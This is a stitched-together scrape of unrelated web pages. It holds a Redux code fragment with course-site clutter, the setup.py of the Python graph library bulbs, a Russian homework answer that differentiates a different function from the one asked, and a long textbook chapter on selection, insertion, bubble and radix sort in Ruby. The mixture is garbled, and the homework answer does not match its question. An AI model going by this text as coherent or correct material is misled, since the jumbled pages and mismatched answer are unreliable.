content
stringlengths 228
999k
| pred_label
stringclasses 1
value | pred_score
float64 0.5
1
|
---|---|---|
0
I know this question has been answered before (pset 3 "search": expected an exit code of 0, not 1), but I took a look at it, and it seems that the scenario in which the person asked the question is different from mine, while it gets the same results, namely in that the position and way the program runs is different. Is there a reason why this is occurring? Code below:
bool search(int value, int values[], int n)
{
//uses binary search to complete the problem
//sets up running midpoint value and other values to control program
int minimum = 0;
int maximum = n - 1;
int midpoint = minimum + ((minimum + maximum)/2);
for (int i = 0; i <= n; i++)
{
if (n <= 0)
{
return false;
}
else
{
//sets up how the program acts in the events of each case
//NOTE: If this happens, either you're lucky, or you deliberately set it up this way. Either way, good job! Partial credit to CS50's binary search video
if (values[midpoint] == value)
{
return true;
}
//NOTE: If the rest happens, you're not so lucky, but ah well
if (values[midpoint] > value)
{
maximum = maximum - 1;
midpoint = minimum + ((minimum + maximum)/2);
}
if (values[midpoint] < value)
{
minimum = minimum + 1;
midpoint = minimum + ((minimum + maximum)/2);
}
}
}
return false;
}
UPDATE: I'm now only receiving this error now.
:( finds 42 in {40,41,42}
\ expected an exit code of 0, not 1
1 Answer 1
1
This code will never find anything unless value == midpoint. On each pass through the loop, it updates the min or the max, but it never updates midpoint. Since midpoint never changes, the loop will either find the value on the first pass at the midpoint, or the loop will just run to completion without ever finding value.
Side note: it would be more efficient to check if n<=0 just once, before the loop. Checking it on every pass through the loop is a waste after the first check.
If this answers your question, please click on the check mark to accept. Let's keep up on forum maintenance. ;-)
11
• Okay, I went ahead and added some code that should update the program, but for some reason, it still doesn't work. I'm going to update the code above. Commented Jul 23, 2016 at 5:02
• The updated code is mixing usage of min, mid and max. Sometimes, these vars are being used for the array indexes, other times, they are being used for the actual contents of array elements. You can't mix usage like that. They should strictly be used as indexes, not as array element values.
– Cliff B
Commented Jul 23, 2016 at 5:27
• Okay, based off the information you presented, I changed the following above. I'll show the code I changed. It still doesn't work but I did follow the instructions to the point where I'm only using something as an index. Commented Jul 23, 2016 at 5:57
• Worse. int minimum = values[0]; sets what should be an array index to the content of an array element. if (values > midpoint) tries to compare the entire array to what should be the index for the middle of the section of array being tested. I could go on, but you need to take some time and really look at the code and think about what the code is really doing and what it should do.
– Cliff B
Commented Jul 23, 2016 at 6:06
• I'll take a look at the code and come back to you tomorrow. Commented Jul 23, 2016 at 6:28
You must log in to answer this question.
Not the answer you're looking for? Browse other questions tagged .
|
__label__pos
| 0.889717 |
4
\overset{x = u^2}{=}
produces an equal sign with x = u^2 above it in a slightly smaller font size.
If I want to add y = v^2 above x = u^2 but with exactly the same font size, how do I do that? \overset{\overset{y = v^2}{x = u^2}}{=} does not work since y = v^2 becomes even smaller.
In addition to that, if possible, I would like all the equal signs to be displayed above each other symmetrically and not a bit to the left or right of each other.
7
I think you may be looking for the \substack command to "stack" y=v^2 above x=u^2.
enter image description here
\documentclass{article}
\usepackage{amsmath}
\begin{document}
\[
\overset{\substack{y=v^2\\x=u^2}}{=} \quad \overset{x=u^2}{=}
\]
\end{document}
Two Addenda: (i) To align the = symbols, use a few \phantoms. (ii) A slight [!] improvement is available by reducing the size of the overset material.
enter image description here
\documentclass{article}
\usepackage{amsmath}
\newcommand\xxx{\phantom{{}^2}} % a phantom that's as wide as a superscript "2"
\begin{document}
\[
\overset{\substack{\xxx y=v^2\\ \xxx x=u^2}}{=} \quad
\overset{ \xxx x=u^2}{=}
\]
\[
\overset{\substack{\scriptscriptstyle\xxx y=v^2\\[-1pt] \scriptscriptstyle\xxx x=u^2}}{=}
\quad\overset{\scriptscriptstyle \xxx x=u^2}{=}
\]
\end{document}
6
• 1
You got first. I didn't want to show the picture, I felt it was terrible even without seeing it.
– egreg
Dec 29 '16 at 17:00
• 2
This is a good answer. I dunno about you, but I feel like the offsetting of the equals sign, caused by the right hand side being wider than the left hand side, is a bit imperfect. Would it be possible to have all the = signs centred wrt each other?
– Au101
Dec 29 '16 at 17:02
• 2
@Au101 - I just posted an addendum to show how one might align the = symbols. :-)
– Mico
Dec 29 '16 at 17:07
• Thank you very much Mico, I greatly appreciate your help.
– David
Dec 29 '16 at 17:10
• 1
@Mico Thanks, I think that looks a little nicer :) And well done on all of that rep! :)
– Au101
Dec 29 '16 at 17:34
4
Done here with stacks and TABstacks. Vertical gaps from primary eqn (set here as 6pt) and between secondary eqns (set as 1pt) can be customized.
\documentclass{article}
\usepackage{tabstackengine}
\stackMath
\TABstackMath
\TABstackMathstyle{\scriptstyle}
\begin{document}
\[
\renewcommand\useanchorwidth{T}
y \stackon[6pt]{{}={}}{\alignstackon[1pt]{\mkern8mu x =& u^2}{y =& v^2}} mx + b
\]
\end{document}
enter image description here
A similar rendition may be obtained with
\[
\renewcommand\useanchorwidth{T}
\setstackgap{S}{1pt}
y \stackon[6pt]{{}={}}{\mkern7mu\alignShortstack{y =& v^2\\ x =& u^2}} mx + b
\]
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.998513 |
Win a copy of Programmer's Guide to Java SE 8 Oracle Certified Associate (OCA) this week in the OCAJP forum!
• Post Reply
• Bookmark Topic Watch Topic
• New Topic
Spring AOP, How does this example do it?
james frain
Ranch Hand
Posts: 36
• Mark post as helpful
• send pies
• Quote
• Report post to moderator
Finished this tutorial and have a problem grasping how or what advice code is called based on this configuration.
I understand the pointcut and when it will be called based on the pattern. I have done AOP examples before using Annotations and it was easy to see how and what code gets called for the advice. In this case is this some inbuilt Advice that is called or how , if I wanted, Could I reconfigure it to call my own advice method?
http://static.springsource.org/docs/Spring-MVC-step-by-step/part6.html
Mark Spritzler
ranger
Sheriff
Posts: 17278
6
IntelliJ IDE Mac Spring
• Mark post as helpful
• send pies
• Quote
• Report post to moderator
james frain wrote:Finished this tutorial and have a problem grasping how or what advice code is called based on this configuration.
I understand the pointcut and when it will be called based on the pattern. I have done AOP examples before using Annotations and it was easy to see how and what code gets called for the advice. In this case is this some inbuilt Advice that is called or how , if I wanted, Could I reconfigure it to call my own advice method?
http://static.springsource.org/docs/Spring-MVC-step-by-step/part6.html
That is how you configure methods to be Transactional in XML. Versus just putting @Transactional on methods. So the pointcut expression is just there to get a Proxy around any class that matches the advisor pointcut expression. the <tx:advice> part tells which methods in those classes should be transactional and what settings besides the defaults should be set. Read the tx:method part to be like Exception handling, where the first match is used. So in ProductManager all methods are Transactional, but any that start with save have all the defaults, and everything else has all the defaults, but read-only is set to true.
Hope that helps clear things up. It is Transaction configuration all here, not your standard self made AOP here, it is getting Transactions with AOP using two namespaces.
This is a big reason why using Annotations for transactions are so much easier than xml. But some people can't use Annotation so they have to use this approach.
Mark
• Post Reply
• Bookmark Topic Watch Topic
• New Topic
|
__label__pos
| 0.815831 |
Consulta de usuários
Caso você já tenha conseguido registrar seu aplicativo, tenha feito a autenticação e gerado um usuário de teste, você deverá aprender a trabalhar com usuários (vendedores e compradores):
Conteúdos
→Consultar meus dados pessoais
→Consultar dados de terceiros
→Obter o ID de usuário
→Consultar informações públicas
→Consultar informações privadas
→Atualizar dados de usuário
→Usuario Vendedor com Mercado Pago obrigatório
→Códigos de erro comuns
Consultar meus dados pessoais
Se você já tiver feito login no Mercado Livre e tiver um token, poderá fazer a seguinte chamada para saber quais são as informações relacionadas a seu usuário.
Exemplo:
curl - X GET https://api.mercadolibre.com/users/me?access_token=$ACCESS_TOKEN
Resposta:
{
"id": 202593498,
"nickname": "TETE2870021",
"registration_date": "2016-01-06T11:31:42.000-04:00",
"first_name": "Test",
"last_name": "Test",
"country_id": "AR",
"email": "[email protected]",
"identification": {
"type": "DNI",
"number": "1111111"
},
"address": {
"state": "AR-C",
"city": "Palermo",
"address": "Test Address 123",
"zip_code": "1414"
},
"phone": {
"area_code": "01",
"number": "1111-1111",
"extension": "",
"verified": false
},
"alternative_phone": {
"area_code": "",
"number": "",
"extension": ""
},
"user_type": "real_estate_agency",
"tags": [
"real_estate_agency",
"test_user",
"user_info_verified"
],
"logo": null,
"points": 100,
"site_id": "MLA",
"permalink": "http://perfil.mercadolibre.com.ar/TETE2870021",
"shipping_modes": [
"custom",
"not_specified"
],
"seller_experience": "ADVANCED",
"seller_reputation": {
"level_id": null,
"power_seller_status": null,
"transactions": {
"period": "historic",
"total": 0,
"completed": 0,
"canceled": 0,
"ratings": {
"positive": 0,
"negative": 0,
"neutral": 0
}
}
},
"buyer_reputation": {
"canceled_transactions": 0,
"transactions": {
"period": "historic",
"total": null,
"completed": null,
"canceled": {
"total": null,
"paid": null
},
"unrated": {
"total": null,
"paid": null
},
"not_yet_rated": {
"total": null,
"paid": null,
"units": null
}
},
"tags": [
]
},
"status": {
"site_status": "active",
"list": {
"allow": true,
"codes": [
],
"immediate_payment": {
"required": false,
"reasons": [
]
}
},
"buy": {
"allow": true,
"codes": [
],
"immediate_payment": {
"required": false,
"reasons": [
]
}
},
"sell": {
"allow": true,
"codes": [
],
"immediate_payment": {
"required": false,
"reasons": [
]
}
},
"billing": {
"allow": true,
"codes": [
]
},
"mercadopago_tc_accepted": true,
"mercadopago_account_type": "personal",
"mercadoenvios": "not_accepted",
"immediate_payment": false,
"confirmed_email": false,
"user_type": "eventual",
"required_action": ""
},
"credit": {
"consumed": 100,
"credit_level_id": "MLA1"
}
}
Consultar dados de terceiros
Se você quiser consultar dados de usuários, terceiros poderá identificar dois níveis de informações: dados públicos, aqueles que podem ser encontrados navegando pelo perfil no Mercado Livre de qualquer outro usuário, Ex.: http://perfil.mercadolibre.com.ar/TETE2870021 e dados privados, que não poderão ser visualizados, a menos que você tenha permissões de usuário e um token válido para trabalhar em nome dele. Em ambos os casos, a primeira coisa que você deverá conhecer é o id do usuário.
Obter o ID de usuário
Caso você não conheça o id, mas saiba o apelido e o site ao qual pertence um usuário, poderá obter seu Id fazendo a seguinte busca.
Chamada:
https://api.mercadolibre.com/sites/{Site_id}/search?nickname={Nickname}
Exemplo:
https://api.mercadolibre.com/sites/MLA/search?nickname=TETE2870021
Resposta:
{
"site_id": "MLA",
"seller": {
"id": 202593498,
"seller_reputation": {
"power_seller_status": null
},
"real_estate_agency": false,
"car_dealer": false,
"tags": [
]
},
"paging": {
"total": 2,
"offset": 0,
"limit": 50
},
"results": [
{
"id": "MLA598903377",
"site_id": "MLA",
"title": "Test Item - Nao Ofertar",
"subtitle": null,
"seller": {
"id": 202593498,
"power_seller_status": null,
"car_dealer": false,
"real_estate_agency": false,
"tags": [
]
},
"price": 200,
"currency_id": "ARS",
"available_quantity": 1,
"sold_quantity": 0,
"buying_mode": "buy_it_now",
"listing_type_id": "bronze",
"stop_time": "2016-03-06T17:16:49.000Z",
"condition": "new",
"permalink": "http://articulo.mercadolibre.com.ar/MLA-598903377-test-item-nao-ofertar-_JM",
"thumbnail": "http://mla-s2-p.mlstatic.com/546311-MLA20539702714_012016-I.jpg",
"accepts_mercadopago": true,
"installments": {
"quantity": 6,
"amount": 42.33,
"currency_id": "ARS"
},
"address": {
"state_id": "AR-C",
"state_name": "Capital Federal",
"city_id": "",
"city_name": "Palermo"
},
"shipping": {
"free_shipping": false,
"mode": "not_specified"
},
"seller_address": {
"id": 175597910,
"comment": "",
"address_line": "",
"zip_code": "",
"country": {
"id": "AR",
"name": "Argentina"
},
"state": {
"id": "AR-C",
"name": "Capital Federal"
},
"city": {
"id": "",
"name": "Palermo"
},
"latitude": -34.571148,
"longitude": -58.423298
},
"attributes": [
],
"original_price": null,
"category_id": "MLA374515",
"official_store_id": null
},
{
"id": "MLA599121050",
"site_id": "MLA",
"title": "Item De Test - No Ofertar",
"subtitle": null,
"seller": {
"id": 202593498,
"power_seller_status": null,
"car_dealer": false,
"real_estate_agency": false,
"tags": [
]
},
"price": 1000,
"currency_id": "ARS",
"available_quantity": 1,
"sold_quantity": 0,
"buying_mode": "buy_it_now",
"listing_type_id": "bronze",
"stop_time": "2016-03-07T20:12:41.000Z",
"condition": "new",
"permalink": "http://articulo.mercadolibre.com.ar/MLA-599121050-item-de-test-no-ofertar-_JM",
"thumbnail": "http://mla-s2-p.mlstatic.com/493311-MLA20538550251_012016-I.jpg",
"accepts_mercadopago": true,
"installments": {
"quantity": 6,
"amount": 211.65,
"currency_id": "ARS"
},
"address": {
"state_id": "AR-C",
"state_name": "Capital Federal",
"city_id": "",
"city_name": "Palermo"
},
"shipping": {
"free_shipping": false,
"mode": "not_specified"
},
"seller_address": {
"id": 175597910,
"comment": "",
"address_line": "",
"zip_code": "",
"country": {
"id": "AR",
"name": "Argentina"
},
"state": {
"id": "AR-C",
"name": "Capital Federal"
},
"city": {
"id": "",
"name": "Palermo"
},
"latitude": -34.571148,
"longitude": -58.423298
},
"attributes": [
],
"original_price": null,
"category_id": "MLA90105",
"official_store_id": null
}
],
"secondary_results": [
],
"related_results": [
],
"sort": {
"id": "relevance",
"name": "More relevant"
},
"available_sorts": [
{
"id": "price_asc",
"name": "Lower price"
},
{
"id": "price_desc",
"name": "Higher price"
}
],
"filters": [
],
"available_filters": [
{
"id": "category",
"name": "Categories",
"type": "text",
"values": [
{
"id": "MLA1648",
"name": "Computación",
"results": 1
},
{
"id": "MLA1430",
"name": "Ropa y Accesorios",
"results": 1
}
]
},
{
"id": "state",
"name": "Location",
"type": "text",
"values": [
{
"id": "TUxBUENBUGw3M2E1",
"name": "Capital Federal",
"results": 2
}
]
},
{
"id": "accepts_mercadopago",
"name": "MercadoPago filter",
"type": "boolean",
"values": [
{
"id": "yes",
"name": "With MercadoPago",
"results": 2
}
]
},
{
"id": "installments",
"name": "Pago",
"type": "text",
"values": [
{
"id": "yes",
"name": "Installments",
"results": 2
},
{
"id": "no_interest",
"name": "Sin interés",
"results": 0
}
]
},
{
"id": "condition",
"name": "Condition filter",
"type": "text",
"values": [
{
"id": "new",
"name": "New",
"results": 2
}
]
},
{
"id": "buying_mode",
"name": "Buying mode filter",
"type": "text",
"values": [
{
"id": "buy_it_now",
"name": "Buy it now",
"results": 2
}
]
},
{
"id": "has_pictures",
"name": "Items with images filter",
"type": "boolean",
"values": [
{
"id": "yes",
"name": "With pictures",
"results": 2
}
]
}
]
}
Consultar informações públicas
Desse modo, você já conhece o Id do usuário, portanto pode realizar a chamada ao recurso users da seguinte maneira, obtendo as informações públicas do usuário que quiser.
Chamada:
curl GET -X https://api.mercadolibre.com/users/{User_id}
Exemplo:
GET -X https://api.mercadolibre.com/users/202593498
Response:
{
"id": 202593498,
"nickname": "TETE2870021",
"registration_date": "2016-01-06T11:31:42.000-04:00",
"country_id": "AR",
"address": {
"state": "AR-C",
"city": "Palermo"
},
"user_type": "normal",
"tags": [
"normal",
"test_user",
"user_info_verified"
],
"logo": null,
"points": 100,
"site_id": "MLA",
"permalink": "http://perfil.mercadolibre.com.ar/TETE2870021",
"seller_reputation": {
"level_id": null,
"power_seller_status": null,
"transactions": {
"period": "historic",
"total": 0,
"completed": 0,
"canceled": 0,
"ratings": {
"positive": 0,
"negative": 0,
"neutral": 0
}
}
},
"buyer_reputation": {
"tags": []
},
"status": {
"site_status": "active"
}
}
Consultar informações privadas de um usuário que aceitou o uso de meu aplicativo
Para obter os dados privados de um usuário, você apenas deve adicionar o ACCESS_TOKEN do usuário ao final da chamada que fez anteriormente. Chamada:
curl GET -X https://api.mercadolibre.com/users/{User_id}?access_token=¢ACCESS_TOKEN
Exemplo:
curl GET -X https://api.mercadolibre.com/users/202593498?access_token=¢ACCESS_TOKEN
Resposta:
{
"id": 202593498,
"nickname": "TETE2870021",
"registration_date": "2016-01-06T11:31:42.000-04:00",
"first_name": "Test",
"last_name": "Test",
"country_id": "AR",
"email": "[email protected]",
"identification": {
"type": "DNI",
"number": "1111111"
},
"address": {
"state": "AR-C",
"city": "Palermo",
"address": "Test Address 123",
"zip_code": "1414"
},
"phone": {
"area_code": "01",
"number": "1111-1111",
"extension": "",
"verified": false
},
"alternative_phone": {
"area_code": "",
"number": "",
"extension": ""
},
"user_type": "normal",
"tags": [
"normal",
"test_user",
"user_info_verified"
],
"logo": null,
"points": 100,
"site_id": "MLA",
"permalink": "http://perfil.mercadolibre.com.ar/TETE2870021",
"shipping_modes": [
"custom",
"not_specified"
],
"seller_experience": "ADVANCED",
"seller_reputation": {
"level_id": null,
"power_seller_status": null,
"transactions": {
"period": "historic",
"total": 0,
"completed": 0,
"canceled": 0,
"ratings": {
"positive": 0,
"negative": 0,
"neutral": 0
}
}
},
"buyer_reputation": {
"canceled_transactions": 0,
"transactions": {
"period": "historic",
"total": null,
"completed": null,
"canceled": {
"total": null,
"paid": null
},
"unrated": {
"total": null,
"paid": null
},
"not_yet_rated": {
"total": null,
"paid": null,
"units": null
}
},
"tags": []
},
"status": {
"site_status": "active",
"list": {
"allow": true,
"codes": [],
"immediate_payment": {
"required": false,
"reasons": []
}
},
"buy": {
"allow": true,
"codes": [],
"immediate_payment": {
"required": false,
"reasons": []
}
},
"sell": {
"allow": true,
"codes": [],
"immediate_payment": {
"required": false,
"reasons": []
}
},
"billing": {
"allow": true,
"codes": []
},
"mercadopago_tc_accepted": true,
"mercadopago_account_type": "personal",
"mercadoenvios": "not_accepted",
"immediate_payment": false,
"confirmed_email": false,
"user_type": "eventual",
"required_action": ""
},
"credit": {
"consumed": 100,
"credit_level_id": "MLA1"
}
}
Como pode ver, dessa vez você obteve uma quantidade maior de dados do usuário: nome e sobrenome, e-mail, telefone, endereço etc. Solicitamos que não revele esses dados publicamente, pois isso pode prejudicar o usuário.
Atualizar dados de usuário
Você pode utilizar nossos recursos para atualizar suas informações de usuário depois do cadastramento. Isso é feito normalmente, porque nessa instância ninguém solicitará que você preencha seu endereço ou identificação pessoal, mas você deverá mantê-los completos, ou não poderá publicar produtos no Mercado Livre. Para atualizar suas informações de usuário, veja o exemplo abaixo:
curl -X PUT -H "Content-Type: application/json" -d
{
"identification_type": "DNI",
"identification_number": "33333333",
"address": "Triunvirato 5555",
"state":"AR-C",
"city":"Capital Federal",
"zip_dode": "1431",
"phone":{
"area_code":"011",
"number":"4444-4444",
"extension":"001"
},
"first_name":"Pedro",
"last_name": "Picapiedras",
"company":{
"corporate_name":"Acme",
"brand_name":"Acme Company"
},
"mercadoenvios": "accepted"
}
https://api.mercadolibre.com/users/{User_id}?access_token=
Parabéns! Você atualizou suas informações de usuário! Lembre-se de enviar somente os campos que quiser atualizar.
Usuario Vendedor com Mercado Pago obrigatório
Se você deseja que todas suas operações sejam exclusivamente a través de Mercado Pago deverão indicar na informação de seu usuário que só aceita essa modalidade. Deste jeito ficará desabilitado a opção “Acordar com o vendedor”. PUT:
curl -X PUT -H "Content-type: application/json" -d
'{
"reason": "by_user"
}'
https://api.mercadolibre.com/users/{user_id}/immediate_payment?access_token=$ACCESS_TOKEN
Se quiser deixar de aceitar como única opção Mercado Pago, pode apagar a marca do seguinte jeito:
curl -XDELETE
'https://api.mercadolibre.com/users/{user_id}/immediate_payment/by_user?access_token=$ACCESS_TOKEN
Códigos de erro comuns
206 – Partial content: muitas vezes, o recurso Users API retorna um código 206 – Partial content. Isso ocorrerá quando a solicitação de alguns dos dados falhar (por exemplo, reputação do usuário) informando que você receberá uma resposta incompleta.
Próximo:
Lojas Oficiais.
Faça parte da nossa comunidade
|
__label__pos
| 0.99724 |
Template Selectors Overview
What is a Template Selector?
The DataTemplateSelector provides a way to apply data templates based on custom logic.
Typically, you use a template selector when you have more than one data template defined for the same type of objects. For example, use it if your binding source is a list of student objects and you want to apply a particular template to the part-time students. You can do this by creating a class that inherits from DataTemplateSelector and by overriding the SelectTemplate() method. Once your class is defined you can assign an instance of the class to the template selector property of your element.
For more information, you can check the DataTemplateSelector Class msdn article.
See Also
In this article
|
__label__pos
| 0.994789 |
Polynomial Expressions
Only available on StudyMode
• Topic: Sentence, Equals sign, Expression
• Pages : 0 (382 words )
• Download(s) : 81
• Published : January 29, 2013
Open Document
Text Preview
[pic][pic][pic][pic][pic][pic][pic][pic][pic][pic][pic][pic][pic][pic][pic][pic] |1. Which expression is not a polynomial? | |(Points : 3) | | [pic] Option A: [pic] | | | | [pic] Option B: 5 | | | | [pic] Option C: 3x3 + 5x [pic]4 | | | | [pic] Option D: [pic] | | | | | |[pic][pic][pic][pic] | |2. Use the polynomial to answer the question. | |12x3 + 5 [pic] 5x2 [pic] 6x2 + 3x3 + 2 [pic]x | |Which expresses the polynomial in standard form?...
tracking img
|
__label__pos
| 0.51975 |
Comet Support by SitePen
IE ActiveX(”htmlfile”) Transport, Part II
by Michael CarterNovember 18th, 2007
In my last post I discussed using the ActiveX(”htmlfile”) technique to provide a usable streaming transport in Internet Explorer. The solution I provided will work, but since writing the last article I’ve made significant progress in understanding why IE behaves the way it does with respect to the streaming transport.
The previous solution amounted to creating an array of messages, pushing messages on that array from the htmlfile iframe, and popping messages off of the array in the parent window, and processing them. Here is the function we use to create that solution:
function connect_htmlfile(url, callback) {
var transferDoc = new ActiveXObject("htmlfile");
transferDoc.open();
transferDoc.write(
"<html><script>" +
"document.domain='" + document.domain + "';" +
"</script></html>");
transferDoc.close();
var ifrDiv = transferDoc.createElement("div");
transferDoc.body.appendChild(ifrDiv);
ifrDiv.innerHTML = "<iframe src='" + url + "'></iframe>";
var messageQueue = [];
transferDoc.message_queue = messageQueue;
var check_for_msgs = function() {
// psuedo code
// while messageQueue.not_empty:
// msg = messageQueue.pop();
// callback(msg);
}
// Check updates ten times a second.
setInterval(check_for_msgs, 100);
}
In the iframe:
<script>parent.messageQueue.append("arbitrary data")</script>
So this does indeed work, albeit with a performance hit for the callback, as well as an added worst-case 100 ms delay for each event. This is not ideal, but at least it works. Unfortunately, what wasn’t adequately explained in my previous article was why it works.
Well, I have the answer in this article. I was prompted to investigate when I received a message on the Orbited mailing list from “Ufo” explaining that it is unnecessary to push messages into a queue and de-queue them later. In fact, the htmlfile transport can be used almost identically to the standard iframe transport. This is the way I originally attempted to implement this transport, and I encountered the premature htmlfile closing issue, so I was a bit surprised by the news. Here is the working (I tested it) code suggested by Ufo on the mailing list:
function connect_htmlfile(url, callback) {
var transferDoc = new ActiveXObject("htmlfile");
transferDoc.open();
transferDoc.write(
"<html><script>" +
"document.domain='" + document.domain + "';" +
"</script></html>");
transferDoc.close();
var ifrDiv = transferDoc.createElement("div");
transferDoc.body.appendChild(ifrDiv);
ifrDiv.innerHTML = "<<frame src='" + url + "'></iframe>";
transferDoc.callback = callback;
setInterval( function () {}, 10000);
}
In the iframe:
<script>parent.callback("arbitrary data")</script>
The last line in connect_html creates a timer that operates every ten seconds and does absolutely nothing. With this line added, the transport suddenly works. Without it, we have the same problems as before. So my original solution worked because of the setInterval, not because of appending messages to a queue. But it seems to make no sense that a timer which does nothing will magically cause the ActiveX(”htmlfile”) connection not to close. I was perplexed by this until I started digging deeper.
Let’s start with the answer. This is a problem of garbage collection. The reason it works is because that last line creates an anonymous function that forms a closure over the scope in which transferDoc was originally defined. Without this closure, there is no reference to transferDoc so its marked by the garbage collector for deletion. The garbage collector doesn’t do its job immediately though. Rather, it operates after a specified interval of instructions on DOM objects. Actually, I believe the garbage collector for JavaScript objects is different than that for DOM objects, so you can do plenty of JavaScript-only manipulations without causing the garbage collection process to occur.
The new code looks like this:
function connect_htmlfile(url, callback) {
// ... Same stuff as before ...
dummy = function() {}
}
This will solve the problem without the setInterval, because we’re still creating a closure around the scope of transferDoc. But this causes a different problem, as first experienced by Andrew Betts and explained in the same mailing thread: once the user navigates away from the page, the htmlfile persists.
The cause of this requires a brief bit of background. In IE there are various methods of causing memory leaks. Normally that’s not a huge deal—the user ends up with a few hundred kilobytes of memory missing, but life goes on. Clearly it isn’t ideal, but neither is it fatal. However, when a live HTTP connection (the htmlfile’s iframe) fails to be garbage collected, we have a huge problem. Not only does it waste server resources to send events to a nonexistent page, it also wreaks havoc on any application logic trying to detect disconnects (for instance, a Comet chat application might want to send a “user has departed” message). Even worse though is that the user will quickly run into the two-connection-per-server limit to the Comet server.
The final solution is very simple. Remember Alex Russell’s original code for the htmlfile transport? We can use it almost exactly, if we remove the var from the transferDoc assignment. The code looks like this:
function connect_htmlfile(url, callback) {
// no more 'var transferDoc...'
transferDoc = new ActiveXObject("htmlfile");
transferDoc.open();
transferDoc.write(
"<html><script>" +
"document.domain='" + document.domain + "';" +
"</script></html>");
transferDoc.close();
var ifrDiv = transferDoc.createElement("div");
transferDoc.body.appendChild(ifrDiv);
ifrDiv.innerHTML = "<iframe src='" + url + "'></iframe>";
transferDoc.callback = callback;
}
And then for the iframe code:
<script>parent.callback(["arbitrary", "data", ["goes", "here"]);</script>
By leaving the page we lose all references to transferDoc and it is thus marked for garbage collection. But surprisingly, navigating away doesn’t always immediately close the connection. The issue is that the garbage collection doesn’t happen right away. This is perfectly fine for data structures that we no longer need, but it is unacceptable for a live HTTP connection to remain open for an unspecified time after the user has left.
The solution is to create an onunload function. The function does two things:
1. Remove the reference to transferDoc
2. Explicitly call the garbage collector
function htmlfile_close() {
transferDoc = null;
CollectGarbage();
}
Gotchas
Any additional references to transferDoc will need to be deleted before CollectGarbage() will actually close the connection. This isn’t as easy to avoid as you might think. In Orbited we still declare transferDoc as var transferDoc = … but then we attach it to the Orbited object: Orbited.transferDoc = transferDoc. The htmlfile_close function would set Orbited.transferDoc = null before garbage collection. But this failed to close the htmlfile connection! The reason was that we had created an additional and unrelated anonymous function defined in the same scope as transferDoc. This function kept a reference to the transferDoc, and even though the function never interacted with transferDoc at all, it was still never closed.
Strangely enough, even if you lose or even explicitly remove all references to the anonymous function that encloses the transferDoc variable’s scope, and all references to transferDoc are elsewhere removed, garbage collection still fails to close the connection.
Thanks
Special thanks to Andrew Betts and Ufo/Camka for discussing the problem in depth on the Orbited mailing list.
[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]
Webtide
19 Responses to “IE ActiveX(”htmlfile”) Transport, Part II”
1. Dave Says:
Hi Michael,
Great article, I’ve a question slightly off topic. You mention the nightmare of memory leaks - what method(s) do you employ to find and solve them? e.g. I use Drip and although according to drip there are no leaks (no dom element leaks) in the stuff I write, I see memory consumption rising on every page refresh.
Any pointers would be appreciated.
Cheers,
Dave
2. Comet Daily » Blog Archive » The Future of Comet: Part 1, Comet Today Says:
[...] element to be added to HTML. These mechanisms, like other Comet “transports” such as htmlfile ActiveX objects, “forever frame” iframes, or XHR streaming, allow a browser to open a persistent [...]
3. Comet Daily » Blog Archive » Buzzword Overload Says:
[...] htmlfile: An ActiveX control in Internet Explorer. Of all the browsers, IE resists attempts to stream data the most, but the htmlfile can be a solution. [...]
4. Comet Daily » Blog Archive » Comet Gazing: Maturity Says:
[...] (polling, long polling, callback polling, iframe streaming, htmlfile streaming, xhr streaming, multipart streaming, [...]
5. Jamie Taleyarkhan Says:
Really nice article, and a good explanation. But when i try it, the callback is undefined.
if my php/cgi flushes the following: alert(typeof parent.callback);
we discover the callback is undefined. as per your article this shouldn’t be the case.
Is it something to do with the version of htmlfile ActiveX?
any ideas? thx
6. Jamie Taleyarkhan Says:
ah ok got it:
transferDoc.parentWindow is the object which is referenced as parent in the ActiveX htmlfile.
cheers,
7. panlong Says:
htmlfile error ‘80004005′
in vbs
8. Tim Says:
I’m running into the same problem as Jamie, but have no idea what his reply means. When I try to reference the callback method, I get:
Object doesn’t support this property or method.
parent.callback is not defined. Any suggestions?
9. Greg Houston Says:
Although this is an old article, I think many would benefit if a working demo was available for download. The example code could just be a basic html file with the JavaScript in it, and a server side PHP file that updated the page with a new timestamp once a second.
I am only able to get a single response from the PHP. As soon as I add a loop with flush and sleep in the PHP nothing happens. Then about twenty minutes later I get a single response. I’m assuming something timed out. Basically the data isn’t streaming. The PHP file is being treated like an ordinary non-streaming document.
10. Eric Waldheim Says:
Using this method I get about 10 seconds of msgs and then it stops working.
When I add the trick Meteor uses to register the callback into the iframe (from meteor.js):
register: function(ifr) {
ifr.p = Meteor.process;
Then message reception continues without interruption.
So I am unconvinced that the technique explained here is the whole story.
Thank you very much for posting this, it was extremely helpful.
11. Tim Says:
4 months later, I FINALLY got this working! Here’s what Jamie was so cryptically trying to say. The line:
transferDoc.callback = callback;
needs to be changed to read:
transferDoc.parentWindow.callback = callback;
Make that one little change, and you go from the maddening code posted in this article that does nothing but generate a javascript error, to a workable solution. :)
12. snotling Says:
Has anyone managed to get this mechanism working in a cross domain setup?
i.e. loading the iframe from a totally different website than the “top” document.
The “document.domain” trick only works for sub-domains unfortunately. So I’ve been running into “Permission denied” issues so far…
I saw references on the Web about the URL fragment identifier hack, but I’m using pieces of information which would be too large to fit in for a start.
Thanks guys!
13. Rahul Vartak Says:
Hi All,
Im facing a problem wherein i have an HTML page with an IFRAME in it.
This IFRAME loads an HTML page which has ActiveX Controls in it.
As the default IE settings prevent an Active X Control from loading, (i.e it shows you a typical security message asking you to allow activeX before loading the entire page) im not able to see the ActiveX enabled content in the IFRAME.
Is there any way in which i can allow ActiveX Controls to run by default?
14. Kyle Says:
This post just saved my life. I am using the Meteor Server (meteorserver.org) for real-time chat on our Ajax site. Everything worked fine in FF, and seemed to work with IE. But when I would refresh the page when the streaming connection was active, I would continuously get an “Object doesn’t support this property or method” error. The strange thing is that, while it was spitting out this error over and over, if I was in another application, and the IE window was behind the application I was using (and not minimized), It would bring the IE window back to the front! I mainly noticed this while in IE8’s developer mode, but I also noticed it affectly my other application in other strange ways. Adding an onunload event containing “Meteor.frameref = null; CollectGarbage();” fixed the problem. In the case of Meteor server, “Meteor.frameref” was equivalent to the “transferdoc” variable. Thanks a lot!
15. Manh Le Says:
Hi,
I figured out how to overcome the permission denied problem.
the part involves document.domain should be changed from
transferDoc.write(
“” +
“document.domain=’” + document.domain + “‘;” +
“”);
to something like this:
var http=[]
http.push(”http://”);
http.push(document.domain);
transferDoc.write(
“” +
